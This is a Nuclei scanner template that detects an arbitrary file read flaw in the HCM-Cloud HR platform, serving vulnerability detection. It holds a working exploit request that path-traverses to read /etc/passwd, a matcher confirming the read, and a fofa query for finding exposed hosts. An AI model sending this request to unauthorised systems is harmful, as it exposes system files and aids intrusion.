30 lines
1.1 KiB
YAML
30 lines
1.1 KiB
YAML
id: hcm-cloud-lfi
|
|
|
|
info:
|
|
name: HCM Cloud - Arbitrary File Read
|
|
author: s4e-io
|
|
severity: high
|
|
description: |
|
|
HCM-Cloud professional human resources platform in the cloud download Arbitrary file read vulnerability.
|
|
reference:
|
|
- https://mp.weixin.qq.com/s/nvV7_ZGDqSUZJ5FNEWDhKw
|
|
- https://github.com/wy876/POC/blob/main/%E6%B5%AA%E6%BD%AE%E4%BA%91/HCM-Cloud%E4%BA%91%E7%AB%AF%E4%B8%93%E4%B8%9A%E4%BA%BA%E5%8A%9B%E8%B5%84%E6%BA%90%E5%B9%B3%E5%8F%B0download%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
fofa-query: icon_hash="-859381597"
|
|
tags: hcm-cloud,lfi,hcm
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/model_report/file/download?index=/&ext=/etc/passwd"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "regex('root:.*:0:0:', body)"
|
|
- 'contains(content_type, "application/octet-stream")'
|
|
- "status_code == 200"
|
|
condition: and
|
|
# digest: 4a0a00473045022026d56dc5db7d021f9588ce83480002e6e15ec8a5b9d2247a75272f80ddc3e6d302210090d0666fb6a8b8fa1f467c96c1103565befbdbfda3b88aa72ab7266ae13f84e7:922c64590222798bb761d5b6d8e72950 |